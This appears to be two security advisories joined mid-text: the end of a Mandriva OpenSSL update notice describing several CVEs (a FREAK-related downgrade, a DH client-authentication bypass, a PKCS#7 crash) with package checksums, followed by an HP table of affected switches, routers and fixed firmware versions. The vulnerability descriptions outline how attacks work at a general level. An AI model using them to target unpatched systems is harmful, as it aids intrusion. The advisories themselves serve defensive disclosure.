The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the FREAK issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations (CVE-2015-0204).
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support (CVE-2015-0205).
The PKCS#7 implementation in OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before 1.0.2a does not properly handle a lack of outer ContentInfo, which allows attackers to cause a denial of service (NULL pointer dereference and application crash) by leveraging an application that processes arbitrary PKCS#7 data and providing malformed data with ASN.1 encoding, related to crypto/pkcs7/pk7_doit.c and crypto/pkcs7/pk7_lib.c (CVE-2015-0289).
The updated packages have been upgraded to the 1.0.1m version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://openssl.org/news/secadv_20150108.txt http://openssl.org/news/secadv_20150319.txt
Updated Packages:
Mandriva Business Server 2/X86_64: 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS kz0ex6eI6hA6qSwklA2NoXY= =GYjX -----END PGP SIGNATURE----- . Please refer to the RESOLUTION section below for a list of impacted products.
Note: mitigation instructions are included below if the following software updates cannot be applied.
Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted 3Com Branded Products Impacted CVE
12900 Switch Series R1005P15 JG619A HP FF 12910 Switch AC Chassis JG621A HP FF 12910 Main Processing Unit JG632A HP FF 12916 Switch AC Chassis JG634A HP FF 12916 Main Processing Unit
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
12500 R1828P06 JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M) H3C 12508 DC Switch Chassis (0235A38L) H3C 12518 DC Switch Chassis (0235A38K)
CVE-2014-3566 CVE-2014-3568
12500 (Comware v7) R7328P04 JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JG497A HP 12500 MPU w/Comware V7 OS JG782A HP FF 12508E AC Switch Chassis JG783A HP FF 12508E DC Switch Chassis JG784A HP FF 12518E AC Switch Chassis JG785A HP FF 12518E DC Switch Chassis JG802A HP FF 12500E MPU H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M) H3C 12508 DC Switch Chassis (0235A38L) H3C 12518 DC Switch Chassis (0235A38K)
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
11900 Switch Series R2111P06 JG608A HP FF 11908-V Switch Chassis JG609A HP FF 11900 Main Processing Unit
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
10500 Switch Series (Comware v5) R1208P10 JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC614A HP 10500 Main Processing Unit JC748A HP 10512 Switch Chassis JG375A HP 10500 TAA Main Processing Unit JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis
CVE-2014-3566 CVE-2014-3568
10500 Switch Series (Comware v7) R2111P06 JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC748A HP 10512 Switch Chassis JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis JG496A HP 10500 Type A MPU w/Comware v7 OS
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
9500E R1828P06 JC124A HP A9508 Switch Chassis JC124B HP 9505 Switch Chassis JC125A HP A9512 Switch Chassis JC125B HP 9512 Switch Chassis JC474A HP A9508-V Switch Chassis JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6) H3C S9512E Routing-Switch Chassis (0235A0G7) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9505E Chassis w/ Fans (0235A38P) H3C S9512E Chassis w/ Fans (0235A38R)
CVE-2014-3566 CVE-2014-3568
7900 R2122 JG682A HP FlexFabric 7904 Switch Chassis JH001A HP FF 7910 2.4Tbps Fabric / MPU JG842A HP FF 7910 7.2Tbps Fabric / MPU JG841A HP FF 7910 Switch Chassis
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
7500 Switch Series R6708P10 JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T JC697A HP A7502 TAA Main Processing Unit JC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE JC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE JC700A HP A7500 384 Gbps TAA Fabric / MPU JC701A HP A7510 768 Gbps TAA Fabric / MPU JD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports JD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports JD194A HP 384 Gbps Fabric A7500 Module JD194B HP 7500 384Gbps Fabric Module JD195A HP 7500 384Gbps Advanced Fabric Module JD196A HP 7502 Fabric Module JD220A HP 7500 768Gbps Fabric Module JD238A HP A7510 Switch Chassis JD238B HP 7510 Switch Chassis JD239A HP A7506 Switch Chassis JD239B HP 7506 Switch Chassis JD240A HP A7503 Switch Chassis JD240B HP 7503 Switch Chassis JD241A HP A7506 Vertical Switch Chassis JD241B HP 7506-V Switch Chassis JD242A HP A7502 Switch Chassis JD242B HP 7502 Switch Chassis JD243A HP A7503 Switch Chassis w/1 Fabric Slot JD243B HP 7503-S Switch Chassis w/1 Fabric Slot H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4) H3C S7503E Ethernet Switch Chassis with Fan (0235A0G2) H3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5) H3C S7506E Ethernet Switch Chassis with Fan (0235A0G1) H3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3) H3C S7510E Ethernet Switch Chassis with Fan (0235A0G0) H3C S7502E Chassis w/ fans (0235A29A) H3C S7503E Chassis w/ fans (0235A27R) H3C S7503E-S Chassis w/ fans (0235A33R) H3C S7506E Chassis w/ fans (0235A27Q) H3C S7506E-V Chassis w/ fans (0235A27S)
CVE-2014-3566 CVE-2014-3568
HSR6800 R3303P18 JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU
CVE-2014-3566 CVE-2014-3568
HSR6800 Russian Version R3303P18 JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU
CVE-2014-3566 CVE-2014-3568
HSR6602 R3303P18 JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router JG777A HP HSR6602-XG TAA Router
CVE-2014-3566 CVE-2014-3568
HSR6602 Russian Version R3303P18 JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router
CVE-2014-3566 CVE-2014-3568
6602 R3303P18 JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D)
CVE-2014-3566 CVE-2014-3568
6602 Russian Version R3303P18 JC176A HP 6602 Router Chassis H3C SR6602 1U Router Host (0235A27D)
CVE-2014-3566 CVE-2014-3568
A6600 R3303P18 JC165A HP 6600 RPE-X1 Router Module JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR66-RPE-X1-H3 (0231A761) H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
CVE-2014-3566 CVE-2014-3568
A6600 Russian Version R3303P18 JC165A HP 6600 RPE-X1 Router Module JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR66-RPE-X1-H3 (0231A761) H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
CVE-2014-3566 CVE-2014-3568
6600 MCP R3303P18 JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
CVE-2014-3566 CVE-2014-3568
6600 MCP Russian Version R3303P18 JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router JG778A HP 6600 MCP-X2 Router TAA MPU
H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
CVE-2014-3566 CVE-2014-3568
5920 Switch Series R2311P05 JG296A HP 5920AF-24XG Switch JG555A HP 5920AF-24XG TAA Switch
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
5900 Switch Series R2311P05 JC772A HP 5900AF-48XG-4QSFP+ Switch JG336A HP 5900AF-48XGT-4QSFP+ Switch JG510A HP 5900AF-48G-4XG-2QSFP+ Switch JG554A HP 5900AF-48XG-4QSFP+ TAA Switch JG838A HP FF 5900CP-48XG-4QSFP+ Switch
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
5830 Switch Series R1118P11 JC691A HP A5830AF-48G Switch w/1 Interface Slot JC694A HP A5830AF-96G Switch JG316A HP 5830AF-48G TAA Switch w/1 Intf Slot JG374A HP 5830AF-96G TAA Switch
CVE-2014-3566 CVE-2014-3568
5820 Switch Series R1809P03 JC102A HP 5820-24XG-SFP+ Switch JC106A HP 5820-14XG-SFP+ Switch with 2 Slots JG219A HP 5820AF-24XG Switch JG243A HP 5820-24XG-SFP+ TAA-compliant Switch JG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media modules Plus OSM (0235A37L) H3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T (RJ45) (0235A370)
CVE-2014-3566 CVE-2014-3568
5800 Switch Series R1809P03 JC099A HP 5800-24G-PoE Switch JC100A HP 5800-24G Switch JC101A HP 5800-48G Switch with 2 Slots JC103A HP 5800-24G-SFP Switch JC104A HP 5800-48G-PoE Switch JC105A HP 5800-48G Switch JG225A HP 5800AF-48G Switch JG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots JG254A HP 5800-24G-PoE+ TAA-compliant Switch JG255A HP 5800-24G TAA-compliant Switch JG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt JG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot JG258A HP 5800-48G TAA Switch w 1 Intf Slot H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot (0235A36U) H3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X (SFP Plus ) Plus 1 media module PoE (0235A36S) H3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus media module (no power) (0235A374) H3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus ) Plus media module (0235A379) H3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module (0235A378) H3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM (0235A36W)
CVE-2014-3566 CVE-2014-3568
5700 R2311P05 JG894A HP FF 5700-48G-4XG-2QSFP+ Switch JG895A HP FF 5700-48G-4XG-2QSFP+ TAA Switch JG896A HP FF 5700-40XG-2QSFP+ Switch JG897A HP FF 5700-40XG-2QSFP+ TAA Switch JG898A HP FF 5700-32XGT-8XG-2QSFP+ Switch JG899A HP FF 5700-32XGT-8XG-2QSFP+ TAA Switch
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
5500 HI Switch Series R5501P06 JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch JG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch JG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt JG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt JG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt JG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt JG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt JG681A HP 5500-24G-SFP HI TAA Swch w/2Slt
CVE-2014-3566 CVE-2014-3568
5500 EI Switch Series R2221P08 JD373A HP 5500-24G DC EI Switch JD374A HP 5500-24G-SFP EI Switch JD375A HP 5500-48G EI Switch JD376A HP 5500-48G-PoE EI Switch JD377A HP 5500-24G EI Switch JD378A HP 5500-24G-PoE EI Switch JD379A HP 5500-24G-SFP DC EI Switch JG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts JG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts JG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts JG250A HP 5500-24G EI TAA Switch w 2 Intf Slts JG251A HP 5500-48G EI TAA Switch w 2 Intf Slts JG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts JG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts H3C S5500-28C-EI Ethernet Switch (0235A253) H3C S5500-28F-EI Eth Switch AC Single (0235A24U) H3C S5500-52C-EI Ethernet Switch (0235A24X) H3C S5500-28C-EI-DC Ethernet Switch (0235A24S) H3C S5500-28C-PWR-EI Ethernet Switch (0235A255) H3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259) H3C S5500-52C-PWR-EI Ethernet Switch (0235A251)
CVE-2014-3566 CVE-2014-3568
5500 SI Switch Series R2221P08 JD369A HP 5500-24G SI Switch JD370A HP 5500-48G SI Switch JD371A HP 5500-24G-PoE SI Switch JD372A HP 5500-48G-PoE SI Switch JG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts JG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts H3C S5500-28C-SI Ethernet Switch (0235A04U) H3C S5500-52C-SI Ethernet Switch (0235A04V) H3C S5500-28C-PWR-SI Ethernet Switch (0235A05H) H3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)
CVE-2014-3566 CVE-2014-3568
5130 EI switch Series R3108P03 JG932A HP 5130-24G-4SFP+ EI Switch JG933A HP 5130-24G-SFP-4SFP+ EI Switch JG934A HP 5130-48G-4SFP+ EI Switch JG936A HP 5130-24G-PoE+-4SFP+ EI Swch JG937A HP 5130-48G-PoE+-4SFP+ EI Swch JG975A HP 5130-24G-4SFP+ EI BR Switch JG976A HP 5130-48G-4SFP+ EI BR Switch JG977A HP 5130-24G-PoE+-4SFP+ EI BR Swch JG978A HP 5130-48G-PoE+-4SFP+ EI BR Swch
CVE-2014-3566 CVE-2014-3567 CVE-2014-3568
5120 EI Switch Series R2221P08 JE066A HP 5120-24G EI Switch JE067A HP 5120-48G EI Switch JE068A HP 5120-24G EI Switch with 2 Slots JE069A HP 5120-48G EI Switch with 2 Slots JE070A HP 5120-24G-PoE EI Switch with 2 Slots JE071A HP 5120-48G-PoE EI Switch with 2 Slots JG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts JG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts JG245A HP 5120-24G EI TAA Switch w 2 Intf Slts JG246A HP 5120-48G EI TAA Switch w 2 Intf Slts JG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts JG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ) H3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS) H3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR) H3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT) H3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU) H3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)
CVE-2014-3566 CVE-2014-3568
5120 SI switch Series R1513P95 JE072A HP 5120-48G SI Switch JE073A HP 5120-16G SI Switch JE074A HP 5120-24G SI Switch JG091A HP 5120-24G-PoE+ (370W) SI Switch JG092A HP 5120-24G-PoE+ (170W) SI Switch H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W) H3C S5120-20P-SI L2 16GE Plus 4SFP (0235A42B) H3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D) H3C S5120-28P-HPWR-SI (0235A0E5) H3C S5120-28P-PWR-SI (0235A0E3)
CVE-2014-3566 CVE-2014-3568
4800 G Switch Series R2221P08 JD007A HP 4800-24G Switch JD008A HP 4800-24G-PoE Switch JD009A HP 4800-24G-SFP Switch JD010A HP 4800-48G Switch JD011A HP 4800-48G-PoE Switch
3Com Switch 4800G 24-Port (3CRS48G-24-91) 3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91) 3Com Switch 4800G 48-Port (3CRS48G-48-91) 3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91) 3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91) CVE-2014-3566 CVE-2014-3568
4510G Switch Series R2221P08 JF428A HP 4510-48G Switch JF847A HP 4510-24G Switch
3Com Switch 4510G 48 Port (3CRS45G-48-91) 3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91) 3Com Switch E4510-24G (3CRS45G-24-91) CVE-2014-3566 CVE-2014-3568
4210G Switch Series R2221P08 JF844A HP 4210-24G Switch JF845A HP 4210-48G Switch JF846A HP 4210-24G-PoE Switch
3Com Switch 4210-24G (3CRS42G-24-91) 3Com Switch 4210-48G (3CRS42G-48-91) 3Com Switch E4210-24G-PoE (3CRS42G-24P-91) CVE-2014-3566 CVE-2014-3568
3610 Switch Series R5319P10 JD335A HP 3610-48 Switch JD336A HP 3610-24-4G-SFP Switch JD337A HP 3610-24-2G-2G-SFP Switch JD338A HP 3610-24-SFP Switch H3C S3610-52P - model LS-3610-52P-OVS (0235A22C) H3C S3610-28P - model LS-3610-28P-OVS (0235A22D) H3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E) H3C S3610-28F - model LS-3610-28F-OVS (0235A22F)
CVE-2014-3566 CVE-2014-3568
3600 V2 Switch Series R2110P03 JG299A HP 3600-24 v2 EI Switch JG300A HP 3600-48 v2 EI Switch JG301A HP 3600-24-PoE+ v2 EI Switch JG301B HP 3600-24-PoE+ v2 EI Switch JG302A HP 3600-48-PoE+ v2 EI Switch JG302B HP 3600-48-PoE+ v2 EI Switch JG303A HP 3600-24-SFP v2 EI Switch JG304A HP 3600-24 v2 SI Switch JG305A HP 3600-48 v2 SI Switch JG306A HP 3600-24-PoE+ v2 SI Switch JG306B HP 3600-24-PoE+ v2 SI Switch JG307A HP 3600-48-PoE+ v2 SI Switch JG307B HP 3600-48-PoE+ v2 SI Switch
CVE-2014-3566 CVE-2014-3568
3100V2 R5203P11 JD313B HP 3100-24-PoE v2 EI Switch JD318B HP 3100-8 v2 EI Switch JD319B HP 3100-16 v2 EI Switch JD320B HP 3100-24 v2 EI Switch JG221A HP 3100-8 v2 SI Switch JG222A HP 3100-16 v2 SI Switch JG223A HP 3100-24 v2 SI Switch
CVE-2014-3566 CVE-2014-3568
3100V2-48 R2110P03 JG315A HP 3100-48 v2 Switch
CVE-2014-3566 CVE-2014-3568
1920 R1105 JG920A HP 1920-8G Switch JG921A HP 1920-8G-PoE+ (65W) Switch JG922A HP 1920-8G-PoE+ (180W) Switch JG923A HP 1920-16G Switch JG924A HP 1920-24G Switch JG925A HP 1920-24G-PoE+ (180W) Switch JG926A HP 1920-24G-PoE+ (370W) Switch JG927A HP 1920-48G Switch
CVE-2014-3566 CVE-2014-3568
1910 R11XX R1107 JG536A HP 1910-8 Switch JG537A HP 1910-8 -PoE+ Switch JG538A HP 1910-24 Switch JG539A HP 1910-24-PoE+ Switch JG540A HP 1910-48 Switch
CVE-2014-3566 CVE-2014-3568
1910 R15XX R1513P95 JE005A HP 1910-16G Switch JE006A HP 1910-24G Switch JE007A HP 1910-24G-PoE (365W) Switch JE008A HP 1910-24G-PoE(170W) Switch JE009A HP 1910-48G Switch JG348A HP 1910-8G Switch JG349A HP 1910-8G-PoE+ (65W) Switch JG350A HP 1910-8G-PoE+ (180W) Switch
CVE-2014-3566 CVE-2014-3568
1620 R1104 JG912A HP 1620-8G Switch JG913A HP 1620-24G Switch JG914A HP 1620-48G Switch
CVE-2014-3566 CVE-2014-3568
MSR20-1X R2513P33 JD431A HP MSR20-10 Router JD667A HP MSR20-15 IW Multi-Service Router JD668A HP MSR20-13 Multi-Service Router JD669A HP MSR20-13 W Multi-Service Router JD670A HP MSR20-15 A Multi-Service Router JD671A HP MSR20-15 AW Multi-Service Router JD672A HP MSR20-15 I Multi-Service Router JD673A HP MSR20-11 Multi-Service Router JD674A HP MSR20-12 Multi-Service Router JD675A HP MSR20-12 W Multi-Service Router JD676A HP MSR20-12 T1 Multi-Service Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router JG209A HP MSR20-12-T-W Router (NA) JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) H3C MSR 20-10 (0235A0A7) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-11 (0235A31V) H3C MSR 20-12 (0235A32E) H3C MSR 20-12 T1 (0235A32B) H3C MSR 20-13 (0235A31W) H3C MSR 20-13 W (0235A31X) H3C MSR 20-15 A (0235A31Q) H3C MSR 20-15 A W (0235A31R) H3C MSR 20-15 I (0235A31N) H3C MSR 20-15 IW (0235A31P) H3C MSR20-12 W (0235A32G)
CVE-2014-3566 CVE-2014-3568
MSR30 R2513P33 JD654A HP MSR30-60 POE Multi-Service Router JD657A HP MSR30-40 Multi-Service Router JD658A HP MSR30-60 Multi-Service Router JD660A HP MSR30-20 POE Multi-Service Router JD661A HP MSR30-40 POE Multi-Service Router JD666A HP MSR30-20 Multi-Service Router JF229A HP MSR30-40 Router JF230A HP MSR30-60 Router JF232A HP RT-MSR3040-AC-OVS-AS-H3 JF235A HP MSR30-20 DC Router JF284A HP MSR30-20 Router JF287A HP MSR30-40 DC Router JF801A HP MSR30-60 DC Router JF802A HP MSR30-20 PoE Router JF803A HP MSR30-40 PoE Router JF804A HP MSR30-60 PoE Router H3C MSR 30-20 Router (0235A328) H3C MSR 30-40 Router Host(DC) (0235A268) H3C RT-MSR3020-AC-POE-OVS-H3 (0235A322) H3C RT-MSR3020-DC-OVS-H3 (0235A267) H3C RT-MSR3040-AC-OVS-H (0235A299) H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323) H3C RT-MSR3060-AC-OVS-H3 (0235A320) H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296) H3C RT-MSR3060-DC-OVS-H3 (0235A269) H3C MSR 30-20 RTVZ33020AS Router Host(AC) (0235A20S) H3C MSR 30-20 (0235A19L) H3C MSR 30-20 POE (0235A239) H3C MSR 30-40 (0235A20J) H3C MSR 30-40 POE (0235A25R) H3C MSR 30-60 (0235A20K) H3C MSR 30-60 POE (0235A25S) H3C RT-MSR3040-AC-OVS-AS-H3 (0235A20V)
